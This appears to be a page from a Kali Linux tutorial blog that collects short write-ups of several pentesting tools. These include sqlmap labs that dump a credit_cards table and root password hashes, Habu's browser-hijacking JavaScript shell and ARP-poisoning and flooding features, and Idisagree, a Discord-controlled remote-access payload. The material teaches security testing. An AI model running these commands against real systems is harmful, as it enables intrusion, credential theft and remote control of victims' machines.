Kali Linux Tutorials

lbd – Tool to Detect Whether a Domain has Load Balancing Enabled

Load balancing(lbd) is the technique used in different services for balancing the load across different servers or NICs. It can be in any form. Load balancing can be done to evenly distribute workload through a series of Computer clusters.

Or it can be used within a single system to balance connections across a set of network interface cards or disks. In a cluster of computers, all systems will have all the data synced within them. A manager resource selects the specific node within the cluster when an incoming request is made.

The manager effectively transfers the connections to another node if the workload of any one of the nodes is high. Thus load balancing minimizes response-time & maximizes throughput. Load balancing can be implemented in both software & hardware levels.

Typically HTTP & DNS load balancing is done when a website has got a lot of incoming traffic like an e-Commerce website or the best example would be Facebook or Google itself.

These websites receive at least 10M requests per minute. So obviously a single host will not be able to serve all these requests. So their requests will be spread over a series of computing resource clusters in order to keep them running.

In a Security perspective, implementing HTTP load balancing has the following major advantages:

DDos & Synflood Protection

Load Balancing enables SYN-Cookies which help in preventing DDoS Attacks. & SYN flood attacks.

SSL Offload & Acceleration

In TLS enabled sites, loads are much higher for the web server since a series of continuous asymmetric encryption is going on. This decreases the throughput, but load balancing balances the load across different nodes inside a cluster and distributes the excessive load due to TLS.

Hiding Error Pages

Some HTTP load balancers can hide the HTTP error pages from being seen outside.

Firewall & IPS

Implementing load balancing creates a layer between the client and the server. So direct connection between the client & server is not possible. So within this layer, firewalls & Intrusion Prevention Systems can be implemented. Moreover, a WAF also can be in the way.

Priority Queuing

Load balancers can prioritize the traffic & intelligently serve the incoming requests.

Reference: https://en.wikipedia.org/wiki/Load_balancing_(computing)

https://www.citrix.com/glossary/load-balancing.html

Comming to the tool, an lbd is a short form for Load Balancing Detection. It is simply a shell script which automates a series of tests to verify whether a domain has load balancing.

Practical Use to a Pentester – lbd

One may ask why to detect load balancing during a pentest. The answer is that it eliminates inconsistency in results. The explanation is, Recon is the major part in every pentest. So it is very essential to determine the range of IP addresses which should be included in the scope of the test.

When dealing with servers with load balancing, the results of regular tests may vary due to the load balancer in work. Sometimes we may get different IP addresses when we ping the host at different times during a test. This is because a DNS-load balancer might be in place.

Missing this fact may prove fatal. Moreover, when determining the infrastructure of the target, we may miss this critical fact and as said earlier, we may miss the presence of an IDS/IPS or a Firewall in between the outside world & the target server.

Simply it may be configured to allow all HTTP traffic so that we are not able to detect it.

Reference: http://www.sans.org/reading-room/whitepapers/testing/identifying-load-balancers-penetration-testing-33313

Options

Syntax: lbd targetdomain port(defaults to 53 & 80) <options>

If you are interested to get under the hood, try the following

cat /usr/bin/lbd

Lab: Enumerate a domain and detect whether it has load balancing enabled

This is simple detection. Let our target be Microsoft’s bing this time.

command: lbd bing.com 80

Try for yourself. Detect whether the e-Commerce company Amazon has load balancing on its web servers. Remember not to harm them or you may face consequences.

CGPwn – Ubuntu VM For Hardware Hacking, RE and Wargaming

CGPwn is a lightweight VM for hardware hacking, RE (fuzzing, symEx, exploiting etc) and wargaming task. Tools included in CGPwn;

Fire up the VM

git clone https://github.com/0xM3R/cgPwn
cd cgPwn
vagrant up
... Grab a beer and relax until everything is getting setup for you ;)
vagrant ssh

CGPwn Default settings

By default, personal dotfiles are installed onto the VM. Simply comment out the following lines in cgPwn.sh if you don’t want my settings.

Also Read Ua-tester – A tool for User Agent WAF, IDS/IPS, Redirection testing

# Personal config
sudo apt-get -y install stow
cd ~
rm .bashrc
git clone https://github.com/0xM3R/dotfiles
cd dotfiles
chmod a+x ./install.sh
./install.sh

Shared folder

Drop files in the sharedFolder folder on your host to find them on your VM at /home/vagrant/sharedFolder

Introspy-iOS : Security Tool For Profiling iOS Application at Runtime

Introspy-iOS is a blackbox tool to help understand what an iOS application is doing at runtime and assist in the identification of potential security issues. This is the repository for the Introspy-iOS tracer.

The tracer can be installed on a jailbroken device to hook and log security-sensitive iOS APIs called by applications running on the device. The tool records details of relevant API calls, including arguments and return values and persists them in a database. Additionally, the calls are also sent to the Console for real-time analysis.

The database can then be fed to Introspy-Analyzer, a Python script to generate HTML reports containing the list of logged function calls as well as a list of potential vulnerabilities affecting the application.

Also Read Ua-tester – A tool for User Agent WAF, IDS/IPS, Redirection testing

How to Install

Download and copy the Debian package to the device; install it:

scp <package.deb> root@<device_ip>:~
ssh root@<device_ip>
dpkg -i <package.deb>

Respring the device:

killall -HUP SpringBoard

There should be two new menus in the device’s Settings. The Apps menu allows you to select which applications will be profiled while the Settings menu defines which API groups are being hooked.

Finally, kill and restart the App you want to monitor.

How to Uninstall

dpkg -r com.isecpartners.introspy

Building Introspy-iOS

Most users should just download and install the pre-compiled Debian package. However, if you want to modify the library’s functionality you will have to build the Debian package yourself.

The build requires the Theos suite, for general instructions on how to install Theos, click here

You must also set the $THEOS variable in your environment, and export it so makes will see its value when you run it

export THEOS=/absolute/path/to/theos
export PATH=$THEOS/bin:$PATH

Then, the package can be built using:

make package

Once you’ve successfully created the Debian package, you can use Theos to automatically install the package and re-spring the device by specifying the device’s IP address in the THEOS_DEVICE_IP environment variable:

export THEOS_DEVICE_IP=192.168.1.127
make install

HABU – Network Penetration Testing Toolkit for Hackers and Pentesters

Habu is a python network hacking toolkit. This tool basic functions that help with some tasks for Ethical Hacking and Penetration Testing. Most of them are related to networking, and the implementations are intended to be understandable for who wants to read the source code and learn from that.

Some techniques implemented in the current version are:

ARP Poisoning
ARP Sniffing
DHCP Discover
DHCP Starvation
LAND Attack
SNMP Cracking
Subdomains Identification
SYN Flooding
TCP Flags Analysis
TCP ISN Analysis
TCP Port Scan
Username check on social networks
Virtual Hosts Identification
Web Technologies Identification

Also Read SQLMAP – Enumeration of Databases & Users from Vulnerable Web Forms

Habu Installation

Kali Linux:

You can install the package created for Kali Linux. See here

Python Package (PyPi):

Habu is on PyPi, so you can install it directly with pip:

$ pip3 install habu

habu.usercheck: Check username on social networks

This command checks if the given username exists on various social networks and other popular sites.

$ habu.usercheck portantier
{
    "aboutme": "https://about.me/portantier",
    "disqus": "https://disqus.com/by/portantier/",
    "github": "https://github.com/portantier/",
    "ifttt": "https://ifttt.com/p/portantier",
    "lastfm": "https://www.last.fm/user/portantier",
    "medium": "https://medium.com/@portantier",
    "pastebin": "https://pastebin.com/u/portantier",
    "pinterest": "https://in.pinterest.com/portantier/",
    "twitter": "https://twitter.com/portantier",
    "vimeo": "https://vimeo.com/portantier"
}

habu.jshell: JavaScript Shell that uses WebSockets

This is one of the most complex commands in Habu. When you start it, binds a port (default: 3333) and listen for HTTP connections. If receives a connection, sends a JavaScript code that opens a WebSocket that can be used to send commands to the connected browser.

You can write the commands directly in the shell, or use plugins, that are simply external JavaScript files.

Using habu.jshell you can completely control a web browser.

Note: The complete documentation of the module will be separated from the main documentation because this module has a lot of options and commands.

$ habu.jshell 
>>> Listening on 192.168.0.10:3333. Waiting for a victim connection.
>>> HTTP Request received from 192.168.0.15. Sending hookjs
>>> Connection from 192.168.0.15
$ _sessions
0 * 192.168.0.15:33432 Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
$ _info
{
    "user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0",
    "location": "http://192.168.0.10:3333/",
    "java-enabled": false,
    "platform": "Linux x86_64",
    "app-code-name": "Mozilla",
    "app-name": "Netscape",
    "app-version": "5.0 (X11)",
    "cookie-enabled": true,
    "language": "es-AR",
    "online": true
}
$ document.location
http://192.168.0.10:3333/

habu.vhosts: Get vhosts of an IP address

This command uses Bing to query the websites hosted on the same IP address.

$ habu.vhosts www.telefonica.com
www.telefonica.com -> 212.170.36.79
[
    'www.telefonica.es',
    'universitas.telefonica.com',
    'www.telefonica.com',
]

habu.webid: Identify Web Technologies

This command uses Wappalyzer apps.json database to identify technologies used on a web application.

More info about Wappalyzer.

Note: This tool only sends one request. So, it’s stealth and not suspicious.

$ habu.webid https://woocomerce.com
{
    "Nginx": {
        "categories": [
            "Web Servers"
        ]
    },
    "PHP": {
        "categories": [
            "Programming Languages"
        ]
    },
    "WooCommerce": {
        "categories": [
            "Ecommerce"
        ],
        "version": "6.3.1"
    },
    "WordPress": {
        "categories": [
            "CMS",
            "Blogs"
        ]
    },
}

SQLMAP – Enumeration of Databases & Users from Vulnerable Web Forms

Sqlmap is a database assessment tool which pentesters & security researchers can use to enumerate databases of various types. Sqlmap automates a normal & advanced sql injection techniques and performs them on a regular form. Refer to the article on Introduction to SQLMAP for getting started.

The following lab sessions are a continuation of the previous one on sqlmap. So I recommend you to go through that post before you proceed with this one unless you know what you are doing. Click Here for the 1st post.

Lab 1: Database Enumeration

In this lab, we enumerate & dump an entire database from a vulnerable web application. For this, we need the URL or copied request to the form we are trying sql injection. In this lab, I am using a request which was saved in a file. Refer here to see how to take this. Here the scenario is same as described in the referred link.

Step 1: Get All Databases

After the request is taken & saved as a file, we can proceed with sqlmap. If you find the page is not vulnerable, the banner grabbing wouldn’t have given exact results. So since the page is vulnerable, let us perform some attacks using sqlmap.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req <replace this with your filename> --dbs

The output comes up with the list of databases in the remote server.

Now that we have a list of databases, we can focus into one of them. For this, I am focusing on a database named Mutillidae.

Step 2: Get tables from the selected database.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -D mutillidae <replace with your db name> --tables

Now we can see tables populating

Now that we have a list of tables residing inside the remote server, we can dump any one of them to our system. All details of the operations performed are automatically stored by sqlmap. For now, let’s concentrate on the table named credit_cards.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -D mutillidae <replace with your db name> -T credit_cards <replace with your table> --dump

Now we can see the table on screen and a file will be automatically generated containing the contents of the table.

Lab 2: User Enumeration

In this lab, we use the same request file to enumerate the database users. Sqlmap can detect users in the database server, their roles & privileges also.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req --users

Now we have to select a target user from the list dumped on the screen. For this tutorial, I am selecting the root user. Let’s now see what are the roles assigned to the user root. Of course, root user would have all roles & privileges but you can substitute the commands for other users.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -U root<replace with your username> --roles

Okay, Now let’s see the user’s privileges

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -U root<replace with your username> --privileges

Now for the best part, let’s see if we can get the password for the user. Yes, sqlmap also does this for you, here is how:

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -U root<replace with your username> --passwords

In this operation, sqlmap ask a couple of new questions. One is whether you want to store the hashes in a temporary file. Another one is whether you want to do a dictionary-based attack right away. You can answer according to your wish.

And finally what you came for, the password hashes. With this recovered, we can try it against any password cracker like JTR or online tools etc.

So now you got an idea on how sqlmap helps you to automate SQL injection, it’s capabilities and functionalities. All these can be put into practice extensively while performing Web Application Security Testing.

As SQLi is the most widely found vulnerability in web applications, you can definitely use sqlmap to check out a no of various kinds of security issues & perform a variety of tests swiftly. As I said earlier, I would like to repeat those words “Virtually, there is no Web application testing without sqlmap”.

Ua-tester – A tool for User Agent WAF, IDS/IPS, Redirection testing

UA-tester is a tool to check whether a website provides different pages for different user agents like for mobile, desktop bots etc. Well, this tool also delivers a lot of information. It is basically a python script which runs through various user-agents on a specified site.

It also tries various options like setting cookie, redirection, URL-stability(whether the URL expires or not) an a lot more. Now I am not sure of how this might be used as a WAF-Tester. But I think, all these options & tests you perform resemble a Nmap scan.

You get a lot of information on response codes, redirection, static/dynamic URLs used, XSS protection, server headers etc. From those, you get to know if there is a WAF at all or what the WAF is doing to prevent from scanning their website. One cool thing is the tool gets you the MD5 of the data got from a request to the site. Changes in the hash for different user-agents indicate there are separate pages.

Options – UA-tester

Syntax: uatester –u url –d <agent1> <agent2>

-u / --url Complete URL
-f / --file <Path to User Agent file> / If no file is provided, -d options must be present
-s / --single provide single user-agent string (may need to be contained within quotes)
-d / --default Select the UA String type(s) to check. Select 1 or more of the following ↵
catagories. (M)obile, (D)esktop, mis(C), (T)ools, (B)ots, e(X)treme [!])
-o / --output <Path to output file> CSV formated output (FILE WILL BE OVERWRITTEN[!])
-v / --verbose results (Displays full headers for each check) >> Recommended
--debug See debug messages (This isn't the switch you're looking for)

UA-Tester Homepage: https://code.google.com/p/ua-tester/

Lab 1: Simple Query to Google

In this lab, we are gonna check with Desktop & mobile user-agents with google.

Command: ua-tester -u www.google.com -d M D

There we can see the different user agents. For each of these user agents, a redirect is being done. Also, check the details displayed.

Arping – To Discover Hosts on a Computer Network

Arping is a computer software tool that is used to discover hosts on a computer network. The program tests whether a given IP address is in use on the local network, and can get additional information about the device using that address.

Arping operates work at the layer 2 (or the link layer of the OSI model) using the Address Resolution Protocol (ARP) for probing hosts. Since ARP is non-routable, this only works for the local network.

However, in networks employing repeaters that use proxy ARP, the ARP response may be coming from such proxy hosts and not from the probed target

Arping Options

-help Show extended help. Not quite as extensive as this manpage, but
more than -h.

-0 Use this option to ping with source IP address 0.0.0.0. Use thiswhen you haven't configured your interface yet. Note that this may get the MAC-ping unanswered. This is an alias for -S 0.0.0.0.

-a Audible ping.

-A Only count addresses matching requested address (This *WILL* break most things you do. Only useful if you are arpinging many hosts at once. See arping-scan-net.sh for an example).

-b Like -0 but source broadcast source address (255.255.255.255). Note that this may get the arping unanswered since it's not normal behavior for a host.

-B Use instead of host if you want to address 255.255.255.255.

-c count Only send count requests.

-d Find duplicate replies. Exit with 1 if there are answers from two different MAC addresses.

-D Display answers as dots and missing packets as exclamation points. Like flood ping on a Cisco.

-e Like -a but beep when there is no reply.

-F Don't try to be smart about the interface name. Even if this switch is not given, -i disables this smartness.

-h Displays a help message and exits.

-i interface Don't guess, use the specified interface.

-p Turn on promiscious mode on interface, use this if you don't "own" the MAC address you are using.

-q Does not display messages, except error messages.

-r Raw output: only the MAC/IP address is displayed for each reply.

-R Raw output: Like -r but shows "the other one", can be combined with -r.

-s MAC Set source MAC address. You may need to use -p with this.

-S IP Like -b and -0 but with set source address. Note that this may get the arping unanswered if the target does not have routing to the IP. If you don't own the IP you are using, you may need to turn on promiscious mode on the interface (with -p). With this switch you can find out what IP-address a host has without taking an IP-address yourself.

-t MAC Set target MAC address to use when pinging IP address.

-T IP Use -T as target address when pinging MACs that won't respond to a broadcast ping but perhaps to a directed broadcast.

-u Show index=received/sent instead of just index=received when pinging MACs.

-v Verbose output. Use twice for more messages.

-w Time to wait between pings, in microseconds.

Manual Page: http://www.unix.com/man-page/all/8/arping/

Lab1 find out MAC address by using victim IP address

This demonstrates the mere-simple use of arping for determining a remote MAC address.

Syntax:  arping –c ‘no. of request’ Ip Address

Command:  arping –c 4 192.168.0.157

Detecting MAC of remote machine using arping

WebvulScan – Web Application Vulnerability Scanner

WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found.

After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.

Also Read SIPI – Simple IP Information Tools for Reputation Data Analysis

The vulnerabilities tested by WebVulScan are:

Reflected Cross-Site Scripting
Stored Cross-Site Scripting
Standard SQL Injection
Broken Authentication using SQL Injection
Autocomplete Enabled on Password Fields
Potentially Insecure Direct Object References
Directory Listing Enabled
HTTP Banner Disclosure
SSL Certificate not Trusted
Unvalidated Redirects

Features:

Crawler: Crawls a website to identify and display all URLs belonging to the website.
Scanner: Crawls a website and scans all URLs found for vulnerabilities.
Scan History: Allows a user to view or download PDF reports of previous scans that they performed.
Register: Allows a user to register with the web application.
Login: Allows a user to login to the web application.
Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default).
PDF Generation: Dynamically generates a detailed PDF report.
Report Delivery: The PDF report is emailed to the user as an attachment.

SIPI – Simple IP Information Tools for Reputation Data Analysis

SIPI tool is aimed for Incident Response Team and anyone what’s want to know the behaviour of the “suspicious” IP Address. The tools do search looking for reputation info from a set of open threat intelligence sources. Information about this IP like malware activity, malicious activity, blacklist, spam and botnet activity.

Also Read Idisagree – Control Remote Computers Using Discord Bot & Python 3

Depedencies:

request
shodan

Installation:

pip install requests & easy_install shodan
git clone "repositori"
config API token into config.json
try: $> python sipi.py any_ip -A

SIPI Descripcion

Simple IP Information Tool

sIPi - is a free reconnaissance tool for obtain IP Address Information from
 many Open Sources: cymon.io | shoda.io | ipinfo.io

Julian J. Gonzalez Caracuel

It is a tool that analyzes an IP or IP list, obtaining as a result information about:

       - reputación / actividad
	- nivel de exposición 
	- geolocalización

Reputation / detection of the IP in blacklists according to the following categories:

 Source: cymon.io - Cymon is the largest open tracker of malware, phishing, botnets, spam, and more
   
           ['malware',
	   'botnet',
	   'spam',
	   'phishing',
	   'malicious activity',
	   'blacklist',
	   'dnsbl']

Nivel de exposición:

Source: shodan.io - Shodan is the world's first search engine for Internet-connected devices.
	
Obtiene información toda la dirección IP que tiene SHODAN sobre la dirección IP, dependiendo del nivel de acceso al motor SHODAN 
se podra obtener información con mayor cantidad de datos (número de puertos, banner, geolocalización)
	
Geolocalización:

Source: ipinfo.io
Obtiene información simple de la dirección IP, geolocalización e información sobre el ASN, permite un ratio de 1000/day

Installation Requirements

cymon.io  - Necesita token de autenticación - usuario registrado ratio: 1000/days
shodan.io - Necesita token de autenticación - usuario registrado limite 100 resultados, puertos limitados

The configuration of the tokens is entered in File: config.json, which must be in the directory where sipi.py is executed << API token from all service is setting up into a “config.json” filename place in the root directory >>

Dependencias

requests

pip install requests

shodan

easy_install shodan

Idisagree – Control Remote Computers Using Discord Bot & Python 3

Idisagree is a tool to Control remote computers using discord bot and python 3. If your target is a windows system, you may want to compile your payload. Do this with py2exe or pyinstaller.

Prerequisites For Idisagree

Python 3.x
pip3
subprocess from python3
Discord from python3

Also Read CTF – Some Setup Scripts For Security Research Tools

TESTED ON

Kali Linux – Rolling Edition
Linux Mint – 18.3 Sylvia
Ubuntu – 16.04.3 LTS
MacOS High Sierra

Clone

git clone https://github.com/UndeadSec/Idisagree.git

Running

cd Idisagree

sudo pip3 install -r requirements.txt

python3Idisagree.py

Screenshot
Video Demo

Note : The use of this tool is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.